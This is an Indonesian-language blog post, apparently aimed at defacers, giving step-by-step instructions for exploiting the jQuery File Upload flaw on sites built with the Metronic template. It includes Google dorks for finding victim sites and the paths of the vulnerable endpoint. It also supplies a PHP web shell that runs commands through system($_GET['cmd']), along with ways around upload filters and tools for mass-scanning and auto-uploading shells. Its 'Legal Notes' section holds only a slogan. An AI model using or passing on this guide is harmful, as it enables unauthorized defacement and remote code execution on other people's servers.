Deface via jQuery File Upload Vulnerability (Metronic Target)

Deface via jQuery File Upload Vulnerability (Metronic Target)

Cara Deface dengan Exploit jQuery File Upload Vulnerability

by: Nyx6st

Apa Itu jQuery File Upload Vulnerability?

jQuery File Upload adalah plugin yang memungkinkan pengguna mengunggah file ke server. Celah ditemukan pada direktori /server/php/ karena kurangnya validasi dan konfigurasi `.htaccess`, terutama pada server Apache 2.4 ke atas.

Bug ini memungkinkan kita mengunggah file arbitrer seperti gambar palsu, script JavaScript, bahkan shell/backdoor PHP jika endpoint tersebut belum diamankan.

Target: Metronic Template

Banyak situs yang menggunakan template Metronic memiliki struktur folder default seperti: /assets/global/plugins/jquery-file-upload/

Dork Google

Cari target dengan dork berikut:

inurl:/assets/global/plugins/jquery-file-upload/
inurl:/assets/plugins/jquery-file-upload
intext:"Metronic Shop UI description."

Gabungkan untuk mendapatkan target akurat:

inurl:jquery-file-upload intext:"Metronic Shop UI"

Langkah Eksploitasi

  1. Akses endpoint eksploit:
    https://target.com/assets/global/plugins/jquery-file-upload/server/php/

    (Bisa berbeda tergantung lokasi folder, coba juga: assets/plugins/ atau public/assets/)

  2. Jika terbuka, coba upload file berekstensi .php, .phtml, atau .jpg.php. Misalnya:
    deface.php
    
    <?php
    
    echo "Hacked by 0x6ick!";
    
    system($_GET['cmd']);
    
    ?>
    
          
  3. Setelah berhasil, akses URL payload yang terupload, biasanya di:
    https://target.com/assets/global/plugins/jquery-file-upload/server/php/files/deface.php
  4. Jika berhasil dieksekusi, berarti server vulnerable dan siap dieksploitasi lebih lanjut.

Bypass & Teknik Lanjutan

  • Rename file: Gunakan shell.php.jpg jika filter hanya melihat ekstensi terakhir.
  • Fake GIF header: Tambahkan GIF89a di awal shell PHP untuk lolos MIME check.
  • Content-Type: Gunakan multipart/form-data saat upload pakai curl/postman.
  • Manfaatkan Burp Suite: Tangkap lalu modifikasi request upload secara manual.

Scanner Tools & Automation

  • jQueryUploadScanner.py: Python tool untuk mass scan folder jquery-file-upload/server/php
  • 6ickUploader: Auto upload shell dan cek path
  • Dork Scraper: Ambil semua target dari Google secara otomatis

Legal Notes

Where Creativity, Exploitation, and Expression Collide.

Penutup

Celah jQuery File Upload adalah contoh klasik dari bagaimana developer lalai menghapus file demo setelah deployment. Meski bug ini tergolong lawas, tapi banyak situs legacy masih rentan karena hanya copy-paste folder Metronic atau AdminLTE tanpa proteksi tambahan.

Post a Comment

Lebih baru Lebih lama